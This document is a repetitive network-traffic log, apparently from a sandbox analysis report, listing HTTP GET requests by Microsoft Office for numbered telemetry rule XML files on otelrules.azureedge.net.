Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
